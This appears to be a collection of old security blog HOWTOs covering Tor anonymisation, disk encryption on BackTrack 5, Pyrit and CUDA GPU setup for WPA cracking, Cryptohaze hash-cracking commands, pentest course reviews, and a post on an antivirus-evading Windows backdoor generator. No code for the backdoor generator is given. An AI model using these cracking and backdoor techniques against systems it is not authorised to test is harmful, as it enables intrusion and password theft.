HOWTO : Anonymously using The Onion Router (Tor)

Part A - Installation of Tor

(A1) Ubuntu or BackTrack 5 R2

Step 1 :

sudo add-apt-repository ppa:ubun-tor/ppa
sudo apt-get update
sudo apt-get install tor tor-geoipdb privoxy vidalia

Step 2 :

sudo nano /etc/privoxy/config

Append the following line :

forward-socks5 / 127.0.0.1:9050 .

sudo /etc/init.d/privoxy start
sudo /etc/init.d/tor start

Step 2a (Optional) :

If you are behind firewall or NAT as well as router, you should append the following line at the configure file.

forward 192.168.*.*/ .

Step 3 :

Go to the Tor official site to download and install Tor button for Firefox.

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

(A2) Windows 7

Download the current version of Tor Browser Bundle 2.2.35-8.

https://www.torproject.org/dist/torbrowser/tor-browser-2.2.35-8_en-US.exe

Extract it and placed the files inside a folder and make a shortcut on the desktop.

Part B - Installation of xChat

(B1) Ubuntu or BackTrack 5 R2

Step 4 :

dig +short irc.tor.freenode.net cname

The result is :

p4fsi4ockecnea7l.onion.

sudo nano /etc/tor/torrc

Append the following line.

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 5 :

sudo /etc/init.d/tor restart

sudo apt-get install xchat

Step 6 :

If you already have your username in Freenode, you can skip this this step.

/msg nickserv register [password] [email]

/msg nickserv set hidemail on

Step 7 :

At the xChat, go to "Settings" | "Preferences" | "Network" | "Network setup" | "Proxy server", enter :

Hostname : 127.0.0.1
Port : 9050
Type : Socks5
Use proxy for : IRC Server Only

Step 8 :

Create a new server "TorifiedFreenode" at xChat of the server list.

Press "Add" and then fill it as "10.40.40.40".

Step 9 :

Download the cap_sasl_xchat.pl at http://lwsitu.com/xchat/cap_sasl_xchat.pl and save it at ~/.xchat2 and make it executable.

Step 10 :

At the status windows of xChat :

/sasl set TorifiedFreenode [your_Freenode_Nickname] [your_Nick_password] PLAIN

Step 11 :

Block CTCP and DCC commands and inquiries that sent to your IRC client software :

/ignore *!*@* CTCP DCC
/ignore * CTCP DCC

/set irc_hide_version ON
/set dcc_auto_chat 0
/set dcc_auto_resume OFF
/set dcc_auto_send 0

(B2) Windows 7

Step 12 :

Download the xChat at http://www.silverex.org/download/ and then install it.

Step 12a :

At the Vidalia Control Panel, select "Settings" | "Advanced" | "Edit current torrc", append the following line :

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 13 :

Download the ActivePerl version 5.12.4.1205 at http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.12.4.1205/ActivePerl-5.12.4.1205-MSWin32-x86-294981.msi

Step 14 :

Download the xcperl5.12.1.dll at http://lwsitu.com/xchat/xcperl5.12.1.dll

Then save it at c:\Program Files (x86)\X-Chat 2\plugins. And delete the xcperl.dll after that.

Step 15 :

Follow the above Step 6 to 11.

Part C - Installation of Filezilla

(C1) Ubuntu and BackTrack 5 R2

Step 16 :

sudo apt-get update
sudo apt-get install filezilla

Step 17 :

Open Filezilla, go to "Edit" | "Settings" | "Generic proxy" :

Select "Socks5"

proxy host : 127.0.0.1
proxy port : 9050


(C2) Windows 7

Step 18 :

Download the current Windows version :

http://filezilla-project.org/download.php?type=client

Then follow the above Step 17.

Part D - Using Tor in Console

Ubuntu and BackTrack 5 R2 only.

Step 19 :

sudo apt-get update
sudo apt-get install proxychains elinks

Step 20 :

sudo nano /etc/proxychains.conf

Change the following line :

socks4 127.0.0.1 9050

To :

socks5 127.0.0.1 9050

Step 21 :

Usage -

proxychains nmap google.com
proxychains elinks cmyip.com
proxychains elinks www.whatismyip.com

That's all! See you.

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

Credit to : Infosec Ramblings and Hak5.org

Step 1 :

The hard drive partitioning is as the following :

/dev/sda1 for /boot
/dev/sda5 for /

Assume the hard drive is band new.

fdisk /dev/sda
n
p
1
+4G
n
e
2
n
l
p
w

* where +4G is set to 4GB for the /dev/sda1 as /boot. You can set it to +1024M or smaller.

Step 2 :

cryptsetup -y -c aes-xts-plain -s 512 luksFormat /dev/sda5
cryptsetup luksOpen /dev/sda5 haktop

* where haktop is the device label

Step 3 :

mkfs.ext2 /dev/sda1
mkfs.ext4 /dev/mapper/haktop

Step 4 :

Install BackTrack 5 R2 as is. However, select custom partitioning. Do not format the partitions. Select /dev/mapper/haktop as ext4 and / while select /dev/sda1 as ext2 and /boot.

Make sure the bootloader is installed at /dev/sda.

Step 5 :

Once the installation is completed, select "Continue testing" and do not reboot the system.

mkdir /mnt/haktop

mount /dev/mapper/haktop /mnt/haktop/
mount /dev/sda1 /mnt/haktop/boot

chroot /mnt/haktop/

mount -t proc proc /proc
mount -t sysfs sys /sys/

Step 6 :

Get the UUID of sda5 by opening another terminal :

blkid /dev/sda5

Copy down the UUID of the /dev/sda5.

nano /etc/crypttab

haktop /dev/disk/by-uuid/<UUID Key> none luks

Step 7 :

nano /usr/share/initramfs-tools/scripts/local-top/cryptroot

Locate the following :

# Try to get a satisfactory password $crypttries times
   count=0
   while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do

Change to :

count=0
echo "Unlocking the disk $cryptsource ($crypttarget)"
while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do

Locate the following :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Unlocking the disk $cryptsource ($crypttarget)\nEnter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then

Change to :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Enter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then

Step 7a :

update-initramfs -u

fix-splash

Now, reboot the system. The bootup will halt at the wallpaper of BackTrack 5. Just press F8 and deleted the prompted "****" and then enter your passphrase to boot the system.

Or, you can just key in the passphrase when the bootup process is stopped at the wallpaper.

Step 8 : (Optional)

If you do not want to press F8, you can delete the "splash" from the following line.

nano /boot/grub/grub.cfg

Locate the following :

linux /vmliunx-3.2.6 root=/dev/mapper/haktop ro text splash vga=791

To make it look likes :

linux /vmliunx-3.2.6 root=/dev/mapper/haktop ro text vga=791

Then, you will be prompted for entering your passphrase on every boot up.

Step 9 :

After the system is boot up, it is required to create swap file.

dd if=/dev/zero of=/swapfile1 bs=1M count=8192

* Where count=8192 is 8GB

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0

Then reboot the system.

See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick


That's all! See you.

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick

Credit to : Hak5.org

Step 1 :

To check the device label :

sfdisk -l /dev/sda
sfdisk -l /dev/sdc

*** Where sda is my hard drive and sdc is the USB stick

Step 2 :

To format the following devices with linux format :

fdisk /dev/sda
d
n
p
1
p
w

fdisk /dev/sdc
d
n
p
1
p
w

Step 3 :

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/first.key

cryptsetup -c aes-xts-plain -s 512 luksFormat /dev/sda1 /tmp/first.key

cryptsetup -d /tmp/first.key luksOpen /dev/sda1 mylaptop

ls /dev/mapper

Step 4 :

mkfs.ext2 /dev/sdc1

mkfs.ext4 /dev/mapper/mylaptop

*** Where mylaptop is the label of the device.

Step 5 :

Install BackTrack 5 R2 as usual. However, do not format the partitions. Select /dev/mapper/mylaptop as ext4 and /. Then, select /dev/sdc1 as ext2 and /boot.

After that, make sure the bootloader is installed at /dev/sdc

Step 6 :

Once the installation is completed, select "Continue testing" and do not reboot.

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/second.key

Make sure the keys are different.

sha1sum /tmp/*key

Step 7 :

cryptsetup -d /tmp/first.key luksAddKey /dev/sda1 /tmp/second.key

mkdir /mnt/mylaptop

mount /dev/mapper/mylaptop /mnt/mylaptop/
mount /dev/sdc1 /mnt/mylaptop/boot

chroot /mnt/mylaptop/

mount -t proc proc /proc
mount -t sysfs sys /sys/

Step 8 :

nano /etc/crypttab

blkid /dev/sda1

mylaptop /dev/disk/by-uuid/<UUID Key> none luks

nano /etc/fstab

/dev/sdb1 /boot ext2 defaults 0 2

Step 9 :

After that, boot BackTrack 5 R2 from the USB stick. It will drop to the busybox.

At the busybox, enter the following commands to unlock the partition. You are required to enter these commands on every boot up.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop

Then press Ctrl-D to continue the boot process.

Step 10 :

After the system is boot up, it is required to create swap file.

dd if=/dev/zero of=/swapfile1 bs=1M count=512

* Where count=512 is 512M

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0

Then reboot the system.

Remarks :

You are required to enter these commands on every boot up.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop

See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

That's all! See you.

HOWTO : Pyrit Cluster with BackTrack 5 R2

Install nVidia CUDA drivers and Pyrit as described here

(A) The server (with the GPUs) Settings

At least run the pyrit once and you will have the following file at ~/.pyrit/config.

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients =
rpc_server = false
workunit_size = 75000

If your system is enabled Hyper-Threading, the "limit_ncpus" should be set to the number of the real CPU cores. For example, my system have 6 real CPU cores and HT is enabled, the setting will be as the following :

limit_ncpus = 6

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)

Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)

Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)

Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)

(B) The client (without or with GPUs) Settings

Client is not required to install nVidia drivers. Just install the BackTrack 5 R2 as is. However, if you client has nvidia display card installed, you should install the nVidia drivers as the captioned mentioned.

The following settings should be set on every client machine.

At least run the pyrit once and you will have the following file at ~/.pyrit/config.

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.0.100
rpc_server = true
workunit_size = 75000

** if you have more than one server, you should set it to (where the IP addresses are the IP address of your servers) :

rpc_knownclients = 192.168.0.100 192.168.0.150

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)

Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)

Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)

Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)

(C) How to run

On the server

pyrit serve

On the client

pyrit benchmark

Remarks :

I have tested this settings on my system with VirtualBox client. The performance of the Pyrit dropped about by half. It is because the VirtualBox client is not on a real network and the CPUs of the VirtualBox client are not real.

By the way, the performance of the cluster will be dropped a lot even in a home gigabit network environment - ThinkPad X100e (AMD CPU with no GPU). I think Pyrit is not very good at network environment at this moment and the CPU power of the client does matter too.

That's all! See you.

HOWTO : BackTrack 5 R2 on Intel X79 Express and nVidia display cards chipset

UPDATE : The better way is here.

Hardware

CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R2

BackTrack 5 R2 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" should be applied to the boot option by pressing "tab" on the boot menu.

Install the BackTrack 5 R2 as usual. When it is required to reboot, do not remove the BackTrack 5 R2 CD. Boot up the CD accordingly. After the BackTrack 5 R2 is booted up, mount the hard drive and add "nomodeset" to boot option of the grub.cfg at /boot/grub.

After that, reboot the system and remove the CD. The system will be boot into BackTrack 5 R2 without problem.

If the kernel is upgraded, you should rebuild the kernel headers by the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/

Installation of nVidia display driver

Go to nVidia Deleloper Zone CUDA Toolkit 4.1 to download the following. Do not enter to X11 by issuing "startx"; otherwise, the installation will be failed.

(1) Download "Latest Drivers for Linux (295.20)" for the nVidia Driver. You can download the driver before not going to the X11.

32-bit :
http://www.nvidia.com/object/linux-display-ia32-295.20-driver.html

64-bit :
http://www.nvidia.com/object/linux-display-amd64-295.20-driver.html

Installation :

32-bit :
chmod +x NVIDIA-Linux-x86-295.20.run
./NVIDIA-Linux-x86-295.20.run

64-bit :
chmod +x NVIDIA-Linux-x86_64-295.20.run
./NVIDIA-Linux-x86_64-295.20.run

After that, you can reboot your system.

Then run the following command to make the suitable resolution :
nvidia-xconfig

(2) Download "CUDA Toolkit for Ubuntu Linux 10.04" for the CUDA Toolkit.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu10.04.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu10.04.run

chmod +x http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_xx_ubuntu10.04.run

*** Accept the default settings.

(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/sdk/gpucomputingsdk_4.1.28_linux.run

chmod +x gpucomputingsdk_4.1.28_linux.run
./gpucomputingsdk_4.1.28_linux.run

nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64
export PATH
export LD_LIBRARY

source /root/.bashrc
ldconfig

After that, reboot the system to make the nVidia driver effect.

Compile Sample code of CUDA

apt-get install freeglut3-dev libxi-dev libXmu-dev

cd NVIDIA_GPU_computing_SDK/C
make

Then, run the sample codes at :

cd NVIDIA_GPU_computing_SDK/C/bin/linux/release
./deviceQuery
./nbody

Installation of pyrit

Add the following to /etc/apt/sources.list :

deb http://security.ubuntu.com/ubuntu lucid-security main
apt-get update
apt-get libssl-dev scapy python-dev

Then, delete the newly added entry of the sources.list.

apt-get update

Go to the official site of pyrit.

cd ~
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

cd pyrit
python setup.py build
python setup.py install

cd cpyrit
python setup.py build
python setup.py install

To test if the installation is correct or not.

pyrit list_cores
pyrit benchmark
pyrit benchmark_long

Remarks :

Fix the splash :
fix-splash

Install the sensors :
apt-get install sensors-applet

Pyrit Cluster Setup
John the Ripper Cluster Setup

See Also : HOWTO : Pyrit Cluster with BackTrack 5 R2

*** Whenever the linux kernel is updated or upgraded, the nVidia driver should be required to reinstalled to match the upgraded kernel version.

That's all! See you.

Before water cooling



After water cooling

Course Review - Offensive Security Wireless Attacks (WiFu)

The Background

After passing the OSCP, I enrolled for the Offensive Security Wireless Attacks (aka WiFu) course. This course is talking about how to attack a wireless rotuer no matter it is set to WEP, WPA or WPA2.

The Hardware

You are required to have at least one wireless device to act as victim (laptop with wireless card or smartphone, such as Android or iPhone) and a computer which is installed with BackTrack 5 R1 as an attacker. The attacker machine is recommended to have a USB adaptor (the USB adaptors that recommended on the official site). If you do not have wireless device as victim, you may consider to buy a wireless USB dongle for your desktop.

Furthermore, you are also required to have a wireless router or access point that equipped with WEP and WPA/WPA2 features (the models are recommeded on the official site).

Beware that not all the wireless dongles or wireless cards can be injected and in monitor mode. In addition, some wireless routers behaved unexpectedly when doing the attacks. For example, my dd-wrt flashed TP-LINK TL-WR1043ND do not perform some of the attacks, such as Korek Chopchop attack. However, not all access points can perform Korek Chopchop attack indeed. Therefore, the suggested hardwares in the official website are recommended to buy.

At the time of this writing, Netgear WNR1000v2h2 N150 can be bought in Hong Kong and it is not so expensive. However, I am not sure if this model is the one stated in the official site. You should not upgrade the firmware but you should downgrade it to v1.0.1.1 as the other version of firmwares do not provide WEP function. The older firmware can be downloaded from the Netgear official site.

My hardwares for the lab are as the following. Hope they can give you some idea :
(1) Access Point - TP-LINK TL-WR1043ND (flashed with dd-wrt v24-sp2 18024) (can be injected)
(2) Access Point - Netgear WNR1000v2h2 N150 (firmware v1.0.1.1)
(3) Victim - Google Nexus One (Android 2.3.6)
(4) Victim - TP-LINK TL-WN321G (54Mbps, Ver 4.1) (can be injected and in monitor mode)
(5) Victim - TP-LINK TL-WN821N (300Mbps, Ver 3.1) (can be injected and in monitor mode)
(6) Attacker - Cloned ALFA Networks AWUS036H USB 500mW (Realtek RTL8187L)

The Course

This course, version 3.0, is designed for beginners. It teaches you the wireless concept and its weakness. The most mentioned tool is Aircrack-NG Suite but it also mentioned others, such as tool that using GPUs for the brute forcing and other advanced tools. However, it does not cover the WPA/WPA2-Enterprise attack.

Offensive Security does not provide any lab for your access. You are required to set up your lab for practice. The hardwares that mentioned above are required for setting up your own lab.

The Challenge

The four hours challenge requires you to SSH to a BackTrack box in order to complete the objectives. After the challenge, you are required to submit your report within 24 hours.

Finally, the exam was over. Within 3 business days, I received an email which informed me that I passed the challenge. If you passed the challenge, you will be an Offensive Security Wireless Professional (OSWP). I am an OSWP now!

The Conclusion

In conclusion, this course will teach you all the basic wireless cracking.

Automatic Backdoor Generator for Windows System

Astr0baby developed an automatic tools to generate a backdoor for Windows system.

Later, www.coresec.org modified his work to make it workable on Back|Track 5. So, I made the modified source code available at here.

Then, I slightly modified coresec.org's work and make a video at here for reference.



The evasion of anti-virus of the captioned generated file is not too good as some of the users posted the generated file to the free anti-virus scanners on the web and/or local anti-virus programs to confirm if it can be detected or not. The problem is that the free scanners on the web will submit the code to their companies for further analysis. So, their detection rate will be higher, just a kind of honeypot. Therefore, if you want to test the generated file locally, please make sure the box cannot surf the internet as the result will be submitted to the anti-virus company after the scan.

I found generation of backdoor automatically is quite interesting. I completely rewrite the code and it can embedded to an executable file. The code can do some simple input data validation too. The current version is 0.2 at the time of this writing. I made a video for the demo. However, the code will not be available at the moment as I am still consider to release the source code or not.



PDFs and image files can also be embedded backdoor to them in the similar way. Therefore, do not download any programs, PDFs and image files from any untrusted sources. Especially, any cracked softwares and free licensed ebooks are to be alerted. This does not only affected Windows system, Linux or Mac OS can be infected too.

That's all! See you.

HOWTO : FreeNAS 8.0.3 RELEASE p1 USB device boot bug fix

The Problem

When I upgraded my FreeNAS to the latest version FreeNAS 8.0.3 RELEASE p1, it refused to boot and stop at the following message.

mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).
GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).

I typed the following command and it boots fine.

ufs:/dev/da0s1a

The problem is that I need to type the captioned command on each boot up. How to solve this problem? Yes, I can.

The Solution

After the system is booting up and a menu is displayed. Select "9) Shell" to go to the shell prompt where we can do the following.

Step 1 :

nano /etc/fstab

Change from :
/dev/ufs/FreeNASs1a / ufs ro 1 1

To :
/dev/ufs/FreeNASs1a / ufs rw 1 1

Step 2 :

Then, save and exit the editor. Execute the following command :

mount -a

Step 3 :

Next, open up another file :

nano /boot/loader.conf

Change from :
#Fix booting from USB device bug
kern.cam.boot_delay=10000

To :
#Fix booting from USB device bug
kern.cam.boot_delay=20000

Save and exit the editor. Then reboot. This time, the boot up is much slower than before but it works. Problem solved!

That's all! See you.

HOWTO : Using USB Devices on VirtualBox 4.1.8

Using USB devices on VirtualBox 4.1.8, which is installed on Ubuntu 12.04 LTS, is easy.

sudo usermod -a samiux -G vboxusers

*where samiux is the user name

Then, logout and re-login. Or, reboot your system.

Now, you can use USB devices on VirtualBox without any problem. However, some devices do not work properly on USB 2.0 enabled on VirtualBox.

That's all! See you.

HOWTO : Create a normal user on MySQL and MariaDB

Using a root account on the web applications as user is risky. It is more secure to create a normal user for the web applications.

Step 1 :

mysqladmin -u samiux -p create mydatabase

*where samiux is the normal username and mydatabase is the name of the database of the web applications

Step 2 :

mysql -u root -p

Step 3 :

GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER ON mydatabase.* TO 'samiux'@'localhost' IDENTIFIED BY 'mypassword';

*where mypassword is the password of the user samiux

That's all! See you.

Course Review - Am I ready for taking Penetration Testing with BackTrack (PWB)

Please be informed that this course has been renamed to "Penetration Testing with Kali Linux (PWK)"

If you decided to take the course - Penetration Testing with BackTrack (PWB), you are required to make sure your knowledge and hardwares are suitable or not. I am now going to share my experience with you all.

Although this course is an entry-level course of Offensive Security, you are required to have some knowledge of networking (including TCP/IP) and capable of operating Linux and Windows systems in command line.

You are also required to have some knowledge of programming. You are not required to be an elite programmer, but you need to understand what a program is and how to read it as well as understand what it is doing. The involved programming language are perl, c, python and bash shell script.

Using of virtual machine, such as VMWare Player or VirtualBox is required. It is because most of the students of the course running their BackTrack on the virtual machine instead of a dedicated machine. That means, you have at least 2GB of system memory for the host computer and guest machine. At least 1GB RAM for the guest will make you more comfortable.

A reasonable speed of internet connection is required. The lab is running on OpenVPN and your router (if any) should be capable of handling VPN connecting. After you registered to the course, you will have chance to test the VPN connection. If the connection is confirmed fine, you can then make the payment. Otherwise, you are not suitable to take the course and do not make the payment.

I have connecting the VPN over my Galaxy Nexus and/or Nexus One on 3G data connection via wifi share with no problem. Anyway, it all depends on the 3G connection quality.

If you will do your lab access at any place, you are suggested to install the BackTrack on the virtul machine and host it on a laptop. The size of the virtual machine is around 20GB as I find this size is more comfortable.

In addition, it is time. Make sure you have a lot of time to do the course and lab. As this course is very hard and time consuming as well as demanding, make sure your family members understood that you have a little time or have no time with them during the course. Sometimes, I even not sleeping for over 24 hours in order to compromise a box in the lab.

At last, taking care of yourself. Do not get flu or sick during the course. Hope you all enjoy the course as I was.

Course Review : Penetration Testing with BackTrack

Course Review - Penetration Testing with BackTrack (PWB)

Please be informed that this course has been renamed to "Penetration Testing with Kali Linux (PWK)"

The Background

About 2 to 3 years ago, I came to know BackTrack 3 and 4. I did not know what this distribution for. At that time, I knew that it is for bad guys according to a local computer magazine.

Later, I came to know the term of "Penetration Testing" and I wanted to know more about this kind of technology and skill. I searched for the videos on the YouTube and learnt something new. However, I did not fully understand what the videos actually talking about and doing.

Some guys in the internet stated that this course (Penetration Testing with BackTrack) is teaching you how to use the BackTrack Linux distribution only and nothing more. Okay, that was not bad at all as I knew nothing about this distribution. Why not took it a try?

Last year, I decided to take this course to learn more about Penetration Test and registered. The course vesion is 3.0 at the time when I took it and it is working very well on BackTrack 5 R1. The price is not high compares with other Information Security courses in the market.

The Course

This course is designed for beginners just like me. It requires you have some knowledge of networking and some programming experience as well as to know how to use Linux and Windows systems. This course is not designed for very skilled and experienced Penetration Testers, in my opinion.

You have a VPN lab, which equipped with several subnets and over 50 machines (I discovered 58), to practice what you have learnt from the course materials. Those machines in the lab are not designed for simple or single step exploitation. You are required to use your creative thinking and skill to compromise those machines.

You are not required to compromise all the machines in the lab in order to take the final challenge, the exam. You can even compromise one machine in the lab and then enroll for the exam. You have 23 hours and 45 minutes to do the exam and submit the report within the next 24 hours. You should enroll the exam within 90 days after the expiration of the lab access time unless you extended it.

The compromised machines in the lab is required to document as well as the exercises in the course materials. In addition, the extra miles in the exercises may count for the exam, I think. So, I suggest to do them all if you can.

In my opinion, make some friends in the #offsec irc channel may help you to solve some problems during the lab access. The most interested thing is that the officials at #offsec irc channel will not help you much for the lab. Sometimes, they may give out hints but sometimes are misleading or useless. They will also tell you to "Try Harder!". Yes, "Try Harder!" is their slogan.

The Challenge

The exam was not easy as I think especially under the pressure. My exam was started in the late evening, that means, I needed to do the exam overnight in the early beginning due to my time zone. I was very tired during the exam. Even I took an hour or so nap, I could not thinking very well. I did some careless mistakes or silly things during the exam and I was wasting a lot of time. My mind was blocked with the problems that I came across. I did not perform very well in the exam.

Finally, the exam was over and the report was submitted. Within 3 business days, I received an email which informed me that I passed the challenge. If you passed the challenge, you will be an Offensive Security Certified Professional (OSCP). I am an OSCP now!

The Conclusion

In conclusion, this course will teach you all the basic Penetration Testing skill and it is worth to take if you are not a very skilled and experienced in this field. I am very enjoy during the course. I learn a lot with the lab and course materials. Recommended!

By toonmanz | View this Toon at ToonDoo | Create your own Toon

Course Review : Am I ready for taking the course of PWB

HOWTO : BackTrack 5 R1 Minor Bug Fix

(A) unicornscan GeoIP not found :

cp /usr/share/GeoIP/GeoIP.dat /usr/local/etc/unicornscan/

(B) Waiting for audio system to respond

mkdir ~/.config/autostart
nano ~/.config/autostart/pulseaudio.desktop

[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio

(C) Wicd cannot connect to D-Bus

dpkg-reconfigure wicd
update-rc.d wicd defaults


BackTrack WiKi
BackTrack WiKi

HOWTO : Cryptohaze Multiforcer on 2 nVidia GeForce GTX 590 and Intel i7-3930K

The Cryptohaze Multiforcer is a high performance CUDA password cracker that is designed to target large lists of hashes. Performance holds very solid with large lists, such that on a suitable server, cracking a list of 1 000 000 passwords is not significantly slower than cracking a list of 10. For anyone who deals with large lists of passwords, this is a very useful tool! Algorithm support includes MD5, NTLM, LM, SHA1, and many others. The official website of Cryptohaze Multiforcer is here.

Download Cryptohaze-Linux_x64_1_30.tar.bz2

tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2

cd Cryptohaze-Linux

nano single_charset

Append the following :

ABCEDFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=\][';/.,

Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :

./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500

Hardware Configuration :

CPU : Intel i7-3930K (12 cores with Hyper-Threading, Socket 2011)
Motherboard : ASUS SaberTooth X79
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2
Hard Drive : Seagate SATA II 1TB x 2
Power Supply : Seasonic X-series 1250W
CPU Heat Sink : Corsair H100 Liquid CPU Cooler
Case : Corsair Graphite Series 600T Black

Remarks :

Installation of CUDA on Back|Track 5 R1

That's all! See you.

HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10

This tutorial is not my work but is OhHeyitsLou. Please credit to him.

Step by step tutorial

Youtube step by step tutorial

That's all! See you.

HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card

Hardware

CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R1

BackTrack 5 R1 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" should be applied to the boot option by pressing "tab" on the boot menu.

Install the BackTrack 5 R1 as usual. When it is required to reboot, do not remove the BackTrack 5 R1 CD. Boot up the CD accordingly. After the BackTrack 5 R1 is booted up, mount the hard drive and add "nomodeset" to boot option of the grub.cfg at /boot/grub.

After that, reboot the system and remove the CD. The system will be boot into BackTrack 5 R1 without problem.

If the kernel is upgraded, you should rebuild the kernel headers by the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/

Installation of nVidia display driver

Go to nVidia Deleloper Zone CUDA Toolkit 4.0 to download the following. Do not enter to X11 by issuing "startx"; otherwise, the installation will be failed.

(1) Download "Developer Drivers for Linux (270.41.19)" for the nVidia Driver.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_32_270.41.19.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_64_270.41.19.run

chmod +x devdriver_4.0_linux_xx_270.41.19.run
./devdriver_4.0_linux_xx_270.41.19.run

(2) Download "CUDA Toolkit for Ubuntu Linux 10.10" for the CUDA Toolkit.

32-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_32_ubuntu10.10.run

64-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

chmod +x cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run
./cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run

(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

chmod +x gpucomputingsdk_4.0.17_linux.run
./gpucomputingsdk_4.0.17_linux.run

nano /root/.bashrc

Append the following :

export PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64

After that, reboot the system to make the nVidia driver effect.

Installation of pyrit

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

